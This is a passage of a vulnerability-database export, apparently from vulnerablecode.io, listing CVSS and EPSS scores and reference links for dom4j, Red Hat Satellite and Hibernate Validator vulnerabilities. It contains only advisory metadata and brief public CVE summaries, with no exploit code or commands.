scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0364
2
reference_url https://access.redhat.com/errata/RHSA-2019:0365
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0365
3
reference_url https://access.redhat.com/errata/RHSA-2019:0380
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0380
4
reference_url https://access.redhat.com/errata/RHSA-2019:1159
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1159
5
reference_url https://access.redhat.com/errata/RHSA-2019:1160
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1160
6
reference_url https://access.redhat.com/errata/RHSA-2019:1161
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1161
7
reference_url https://access.redhat.com/errata/RHSA-2019:1162
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1162
8
reference_url https://access.redhat.com/errata/RHSA-2019:3172
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3172
9
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000632.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000632.json
10
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-1000632
reference_id
reference_type
scores
0
value 0.01611
scoring_system epss
scoring_elements 0.81725
published_at 2026-04-07T12:55:00Z
1
value 0.01611
scoring_system epss
scoring_elements 0.81752
published_at 2026-04-08T12:55:00Z
2
value 0.01611
scoring_system epss
scoring_elements 0.81757
published_at 2026-04-09T12:55:00Z
3
value 0.01611
scoring_system epss
scoring_elements 0.81776
published_at 2026-04-11T12:55:00Z
4
value 0.01611
scoring_system epss
scoring_elements 0.81764
published_at 2026-04-12T12:55:00Z
5
value 0.01611
scoring_system epss
scoring_elements 0.81758
published_at 2026-04-13T12:55:00Z
6
value 0.01611
scoring_system epss
scoring_elements 0.81695
published_at 2026-04-01T12:55:00Z
7
value 0.01611
scoring_system epss
scoring_elements 0.81705
published_at 2026-04-02T12:55:00Z
8
value 0.01611
scoring_system epss
scoring_elements 0.81728
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-1000632
11
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000632
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000632
12
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
13
reference_url https://github.com/dom4j/dom4j
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dom4j/dom4j
14
reference_url https://github.com/dom4j/dom4j/commit/c2a99d7dee8ce7a4e5bef134bb781a6672bd8a0f
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dom4j/dom4j/commit/c2a99d7dee8ce7a4e5bef134bb781a6672bd8a0f
15
reference_url https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387
16
reference_url https://github.com/dom4j/dom4j/issues/48
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dom4j/dom4j/issues/48
17
reference_url https://ihacktoprotect.com/post/dom4j-xml-injection
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://ihacktoprotect.com/post/dom4j-xml-injection
18
reference_url https://ihacktoprotect.com/post/dom4j-xml-injection/
reference_id
reference_type
scores
url https://ihacktoprotect.com/post/dom4j-xml-injection/
19
reference_url https://lists.apache.org/thread.html/00571f362a7a2470fba50a31282c65637c40d2e21ebe6ee535a4ed74@%3Ccommits.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/00571f362a7a2470fba50a31282c65637c40d2e21ebe6ee535a4ed74@%3Ccommits.maven.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/4a77652531d62299a30815cf5f233af183425db8e3c9a824a814e768@%3Cdev.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/4a77652531d62299a30815cf5f233af183425db8e3c9a824a814e768@%3Cdev.maven.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/5a020ecaa3c701f408f612f7ba2ee37a021644c4a39da2079ed3ddbc@%3Ccommits.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/5a020ecaa3c701f408f612f7ba2ee37a021644c4a39da2079ed3ddbc@%3Ccommits.maven.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/7e9e78f0e4288fac6591992836d2a80d4df19161e54bd71ab4b8e458@%3Cdev.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/7e9e78f0e4288fac6591992836d2a80d4df19161e54bd71ab4b8e458@%3Cdev.maven.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/7f6e120e6ed473f4e00dde4c398fc6698eb383bd7857d20513e989ce@%3Cdev.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/7f6e120e6ed473f4e00dde4c398fc6698eb383bd7857d20513e989ce@%3Cdev.maven.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/9d4c1af6f702c3d6d6f229de57112ddccac8ce44446a01b7937ab9e0@%3Ccommits.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/9d4c1af6f702c3d6d6f229de57112ddccac8ce44446a01b7937ab9e0@%3Ccommits.maven.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/d7d960b2778e35ec9b4d40c8efd468c7ce7163bcf6489b633491c89f@%3Cdev.maven.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/d7d960b2778e35ec9b4d40c8efd468c7ce7163bcf6489b633491c89f@%3Cdev.maven.apache.org%3E
27
reference_url https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E
28
reference_url https://lists.debian.org/debian-lts-announce/2018/09/msg00028.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/09/msg00028.html
29
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOOVVCRQE6ATFD2JM2EMDXOQXTRIVZGP
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOOVVCRQE6ATFD2JM2EMDXOQXTRIVZGP
30
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOOVVCRQE6ATFD2JM2EMDXOQXTRIVZGP/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOOVVCRQE6ATFD2JM2EMDXOQXTRIVZGP/
31
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJULAHVR3I5SX7OSMXAG75IMNSAYOXGA
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJULAHVR3I5SX7OSMXAG75IMNSAYOXGA
32
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJULAHVR3I5SX7OSMXAG75IMNSAYOXGA/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJULAHVR3I5SX7OSMXAG75IMNSAYOXGA/
33
reference_url https://security.netapp.com/advisory/ntap-20190530-0001
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20190530-0001
34
reference_url https://security.netapp.com/advisory/ntap-20190530-0001/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20190530-0001/
35
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
36
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
37
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
38
reference_url https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
39
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1620529
reference_id 1620529
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1620529
40
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-1000632
reference_id CVE-2018-1000632
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-1000632
41
reference_url https://github.com/advisories/GHSA-6pcc-3rfx-4gpm
reference_id GHSA-6pcc-3rfx-4gpm
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6pcc-3rfx-4gpm
42
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
43
reference_url https://usn.ubuntu.com/4619-1/
reference_id USN-4619-1
reference_type
scores
url https://usn.ubuntu.com/4619-1/
fixed_packages
aliases CVE-2018-1000632, GHSA-6pcc-3rfx-4gpm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nmya-eyxd-9ybe
54
url VCID-nugh-hm1r-73c7
vulnerability_id VCID-nugh-hm1r-73c7
summary Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14380.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14380.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-14380
reference_id
reference_type
scores
0
value 0.00319
scoring_system epss
scoring_elements 0.54902
published_at 2026-04-01T12:55:00Z
1
value 0.00319
scoring_system epss
scoring_elements 0.54972
published_at 2026-04-02T12:55:00Z
2
value 0.00319
scoring_system epss
scoring_elements 0.54998
published_at 2026-04-04T12:55:00Z
3
value 0.00319
scoring_system epss
scoring_elements 0.54968
published_at 2026-04-07T12:55:00Z
4
value 0.00319
scoring_system epss
scoring_elements 0.55017
published_at 2026-04-09T12:55:00Z
5
value 0.00319
scoring_system epss
scoring_elements 0.55029
published_at 2026-04-11T12:55:00Z
6
value 0.00319
scoring_system epss
scoring_elements 0.5501
published_at 2026-04-12T12:55:00Z
7
value 0.00319
scoring_system epss
scoring_elements 0.54988
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-14380
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1873926
reference_id 1873926
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1873926
3
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-14380
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nugh-hm1r-73c7
55
url VCID-pd7m-bhqf-kkge
vulnerability_id VCID-pd7m-bhqf-kkge
summary In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue().
references
0
reference_url https://access.redhat.com/errata/RHSA-2017:2808
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:2808
1
reference_url https://access.redhat.com/errata/RHSA-2017:2809
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:2809
2
reference_url https://access.redhat.com/errata/RHSA-2017:2810
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:2810
3
reference_url https://access.redhat.com/errata/RHSA-2017:2811
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:2811
4
reference_url https://access.redhat.com/errata/RHSA-2017:3141
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3141
5
reference_url https://access.redhat.com/errata/RHSA-2017:3454
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3454
6
reference_url https://access.redhat.com/errata/RHSA-2017:3455
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3455
7
reference_url https://access.redhat.com/errata/RHSA-2017:3456
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3456
8
reference_url https://access.redhat.com/errata/RHSA-2017:3458
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3458
9
reference_url https://access.redhat.com/errata/RHSA-2018:2740
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2740
10
reference_url https://access.redhat.com/errata/RHSA-2018:2741
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2741
11
reference_url https://access.redhat.com/errata/RHSA-2018:2742
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2742
12
reference_url https://access.redhat.com/errata/RHSA-2018:2743
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2743
13
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
14
reference_url https://access.redhat.com/errata/RHSA-2018:3817
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:3817
15
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-7536.json
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-7536.json
16
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-7536
reference_id
reference_type
scores
0
value 0.00104
scoring_system epss
scoring_elements 0.28482
published_at 2026-04-04T12:55:00Z
1
value 0.00104
scoring_system epss
scoring_elements 0.2844
published_at 2026-04-02T12:55:00Z
2
value 0.00104
scoring_system epss
scoring_elements 0.28365
published_at 2026-04-01T12:55:00Z
3
value 0.00104
scoring_system epss
scoring_elements 0.28275
published_at 2026-04-07T12:55:00Z
4
value 0.00104
scoring_system epss
scoring_elements 0.28341
published_at 2026-04-08T12:55:00Z
5
value 0.00127
scoring_system epss
scoring_elements 0.31984
published_at 2026-04-13T12:55:00Z
6
value 0.00127
scoring_system epss
scoring_elements 0.32052
published_at 2026-04-09T12:55:00Z
7
value 0.00127
scoring_system epss
scoring_elements 0.32056
published_at 2026-04-11T12:55:00Z
8
value 0.00127
scoring_system epss
scoring_elements 0.32017
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-7536
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1465573
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1465573
18
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7536
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7536
19
reference_url https://github.com/hibernate/hibernate-validator
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator
20
reference_url https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b
21
reference_url https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac
22
reference_url https://github.com/hibernate/hibernate-validator/commit/0ed45f37c4680998167179e631113a2c9cb5d11
reference_id
reference_type
scores
url https://github.com/hibernate/hibernate-validator/commit/0ed45f37c4680998167179e631113a2c9cb5d11
23
reference_url https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E
25
reference_url http://www.securityfocus.com/bid/101048
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://www.securityfocus.com/bid/101048
26
reference_url http://www.securitytracker.com/id/1039744
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://www.securitytracker.com/id/1039744
27
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=885577
reference_id 885577
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=885577
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:hibernate_validator:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:hibernate_validator:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:hibernate_validator:*:*:*:*:*:*:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
reference_type
scores
